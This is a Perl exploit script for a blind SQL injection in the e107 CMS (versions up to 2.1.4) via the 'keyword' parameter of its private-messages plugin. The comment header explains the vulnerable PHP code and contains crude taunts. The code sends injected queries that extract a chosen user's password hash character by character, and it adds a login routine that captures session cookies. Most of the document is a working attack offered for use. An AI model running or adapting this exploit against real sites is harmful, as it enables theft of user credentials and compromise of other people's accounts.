#!/usr/bin/perl### e107 <= 2.1.4 "keyword" Blind SQL Injection Exploit## --------------------------------------------------------------------------# [*] Discovered by staker - staker[at]hotmail[dot]it # [*] Discovered on 09/03/2017# [*] Site Vendor: http://www.e107.org# [*] BUG: Blind SQL Injection# --------------------------------------------------------------------------### Description# -------------------------------------------------------------------------# e107 contains one flaw that allows an attacker to carry out an SQL# injection attack. The issue is due to the "e107_plugins/pm/pm.php" script # not properly saniting user-supplied input to the "keyword" POST variable# This may allow an attacker to inject or manipulate sql queries in# the backend database regardless of php.ini settings# -------------------------------------------------------------------------# SHORT EXPLANATION# -----------------------------------# # FILE:"e107_handlers/core_functions.php"## 76. function vartrue(&$val, $default='') # 77. {# 78. if (isset($val) && $val) { return $val; } {1} <--- variable is not sanized to be sent at the mysql database# 79.return $default;# 80.}## ----------------------------------## FILE: "e107/e107_plugins/pm/pm.php"## # 35. if(vartrue($_POST['keyword'])) {2}<--- if $_POST keyword variable is set, then e107 starts pm_user_lookup() function.# 36. {# 37. pm_user_lookup();# 38.}#### 615. function pm_user_lookup()# 616. {# 617.$sql = e107::getDb();# 618.# 619. $query = "SELECT * FROM #user WHERE user_name REGEXP '^".$_POST['keyword']."' "; {3} <---- variable not sanized# 620. if($sql->gen($query))# 621. {# 622. echo '[';# 623while($row = $sql->fetch())# 624. {# 625. $u[] ="{\"caption\":\"".$row['user_name']."\",\"value\":".$row['user_id']."}";# 626. }# 627.# 628.echo implode(",",$u);# 629.echo ']';# -----------------------------------### use your brain..## Greetz to: Warwolfz Crew,# meh, Dante90, SHADES MASTER and nexen## -- 0gay --## -----------------------------------# YOUR MOM IS NOT SAFE ANYMORE!!# CALL HER!!# -----------------------------------
use strict;
use IO::Socket::INET;
use LWP::UserAgent;
my ($URL,$uid)= @ARGV;
my @chars =(8..122);
my ($i,$ord,$hash)=(1,undef,undef);if(@ARGV !=2){ usage();}
$URL = parse::URL($URL);
syswrite (STDOUT,"[-] Crypted Password: ");for($i=0;$i<=60;$i++){
foreach $ord(@chars){if(e107::Query(sql($i,$ord),$URL)==666){
syswrite (STDOUT,chr($ord));
$hash.=chr($ord);
last;}if($i ==2andnot defined $hash){
syswrite (STDOUT,"\n[-] Exploit Failed");
exit;}}}if(length($hash)==60){
die "\[-]Exploit Successfully";}else{
die "\n[-] Exploit Failed";}
sub e107::Query
{# 1st parameter, sql query# 2nd parameter, e107 website
my ($query,$URL)= @_;
my $response = undef;
my $lwp = new LWP::UserAgent;
$lwp->default_header('User-Agent'=>'Lynx (textmode)');
$response = $lwp->post($URL."/pm/",[
keyword => $query
])or die $!;if($response->content =~/caption/){return666;}else{return0;}}
sub parse::URL
{
my $string = shift @_ || die($!);if($string !~/^http:\/\/?/i){
$string ='http://'.$string;}return $string;}
sub sql
{# 1st parameter, an e107's userid# 2nd parameter substring number# 3rd parameter charcode number
my ($i,$j,$sql)=(shift,shift,undef);
$sql ="' AND ASCII(SUBSTRING((SELECT user_password FROM e107_user WHERE user_id=".$uid."),".$i.",1))=".$j."#";return $sql;}
sub e107::Cookies
{
my ($username,$password)= @_;
my ($packet,$content);
my $host ="127.0.0.1";# Valid Host(insert it manually)
my $path ="/e107/";# Valid e107 path (insert it manually)
my $data ="username=",$username."&userpass=".$password."&userlogin=Sign+In";
my $socket= new IO::Socket::INET(
PeerAddr => $host,
PeerPort =>80,
Proto=>'tcp',)or die $!;
$packet .="POST ".$path."/login.php HTTP/1.1\r\n";
$packet .="Host: ".$host."\r\n";
$packet .="User-Agent: Lynx (textmode)\r\n";
$packet .="Content-Type: application/x-www-form-urlencoded\r\n";
$packet .="Content-Length:".length($data)."\r\n";
$packet .="Connection: close\r\n\r\n";
$packet.= $data;
$socket->send($packet);while(<$socket>){
$content .= $_;}if($content =~/Set-Cookie:(.+?)/){return $1;}else{
die("[-] Login Failed..\n");}# This function is useful to log-in and retrieves your cookies, but you don't need it for this exploit.# it works without log-in, but if you got some trouble, try to use this one.# e107::Login('YOUR USERNAME','YOUR PASSWORD');}
sub usage(){print"[*---------------------------------------------------------*]\n"."[*e107 <= 2.1.4 'keyword' Blind SQL Injection Exploit*]\n"."[*---------------------------------------------------------*]\n"."[* Usage: perl web.pl [host] [uid] *]\n"."[* *]\n"."[* Options:*]\n"."[* [host] insert a valid host*]\n"."[* [uid]insert a userid*]\n"."[*---------------------------------------------------------*]\n";
exit;}